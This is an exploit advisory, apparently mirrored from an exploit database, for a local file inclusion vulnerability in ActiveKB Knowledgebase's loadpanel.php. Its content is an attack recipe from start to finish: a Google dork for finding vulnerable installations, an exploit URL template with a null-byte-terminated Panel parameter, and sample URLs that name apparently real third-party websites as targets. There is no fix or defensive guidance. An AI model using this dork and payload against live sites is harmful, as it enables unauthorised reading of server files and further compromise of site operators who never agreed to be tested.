ActiveKB Knowledgebase (loadpanel.php Panel) Local File Inclusion Vuln

2009-04-03T00:00:00
ID 1337DAY-ID-4989
Type zdt
Reporter Angela Chang
Modified 2009-04-03T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
ActiveKB Knowledgebase (loadpanel.php Panel) Local File Inclusion Vuln
======================================================================


[o]------------------------------------------------------------------------------------[x]
 |  Local File Inclusion Vulnerability                                                  |
[o]------------------------------------------------------------------------------------[o]
 |  Software  : ActiveKB Knowledgebase version X.X                                      |
 |  Vendor    : http://www.interspire.com/activekb/                                     |
 |  Date      : 02 April 2009                                                           |
 |  Author    : Angela Chang                                                            |
[o]------------------------------------------------------------------------------------[o]

[»] Google Dork

    "Powered by ActiveKB Knowledgebase Software"
    inurl:loadpanel.php?Panel=

[»] Vulnerable

    ./loadpanel.php

[»] Exploit

    http://[site]/[path]/loadpanel.php?Panel=[LFI]%00

[»] Sample

    http://help.theedweb.com/activekb/loadpanel.php?Panel=[LFI]%00
    http://my.myriadnetwork.com/kb//loadpanel.php?Panel=[LFI]%00



#  0day.today [2018-02-17]  #